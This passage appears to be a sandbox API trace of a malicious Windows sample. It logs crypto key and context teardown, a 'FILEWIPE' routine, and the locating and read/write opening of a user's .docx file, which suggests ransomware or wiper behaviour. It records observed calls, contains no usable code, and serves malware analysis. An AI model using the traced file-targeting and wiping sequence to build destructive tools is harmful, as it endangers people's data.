[0035.330] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.330] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0035.330] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.330] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.330] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.330] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.331] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0035.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0035.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0035.331] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.331] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0035.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0035.331] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0035.331] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0035.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0035.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0035.331] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.331] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.331] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0035.331] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0035.331] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0035.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0035.331] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0035.331] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.336] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.336] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0035.336] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.337] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.337] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.337] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0035.337] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.338] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.338] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0035.338] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.338] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.338] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.338] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0035.338] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.338] CryptDestroyKey (hKey=0x7c2200) returned 1 [0035.338] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0035.338] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0035.338] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0035.338] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0035.338] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.338] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0035.338] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0035.338] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.338] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.338] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0035.338] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0035.338] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0035.339] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0035.339] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0035.339] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.339] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.339] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.339] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0035.339] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0035.339] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0035.339] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0035.339] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0035.339] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0035.339] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0035.339] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0035.339] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.339] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0035.339] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0035.339] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.339] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.339] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0035.339] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.339] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.339] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.339] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0035.339] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0035.339] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0035.339] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.339] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.339] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.340] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0035.340] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0035.340] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.340] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.340] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.340] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0035.340] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0035.340] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0035.340] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0035.340] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0035.340] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0035.340] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.340] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0035.340] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.340] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.340] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.340] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.341] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0035.341] FreeLibrary (hLibModule=0x754b0000) returned 1 [0035.341] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0035.341] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0035.341] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.341] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0035.341] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.341] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0035.341] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0035.341] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.343] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.343] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.343] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.343] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0035.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0035.343] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0035.344] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.344] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.344] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x720f9900, ftCreationTime.dwHighDateTime=0x1d5b74c, ftLastAccessTime.dwLowDateTime=0x415d5310, ftLastAccessTime.dwHighDateTime=0x1d5bb84, ftLastWriteTime.dwLowDateTime=0x415d5310, ftLastWriteTime.dwHighDateTime=0x1d5bb84, nFileSizeHigh=0x0, nFileSizeLow=0xaafb, dwReserved0=0x0, dwReserved1=0x777648, cFileName="YjePcpmZ.docx", cAlternateFileName="YJEPCP~1.DOC")) returned 0x7c2100 [0035.344] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0035.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0035.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0035.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0035.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0035.344] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.344] CharLowerBuffW (in: lpsz="byte[43771]", cchLength=0xb | out: lpsz="byte[43771]") returned 0xb [0035.345] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.345] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0035.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0035.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0035.345] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.345] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0035.345] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0035.345] FreeLibrary (hLibModule=0x76b40000) returned 1 [0035.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0035.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0035.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0035.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0035.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0035.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0035.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0035.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0035.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0035.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0035.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0035.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0035.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0035.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0035.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0035.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0035.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0035.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0035.346] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0035.346] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0035.346] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0035.346] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.346] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.346] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.346] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0035.346] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.346] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.346] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.346] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.346] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.346] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.346] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.346] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.346] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.346] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.346] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.346] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.346] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.347] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.347] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.347] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.347] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0035.347] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.347] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\YjePcpmZ.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\yjepcpmz.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0035.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0035.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0035.347] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0035.347] RtlAllocateHeap 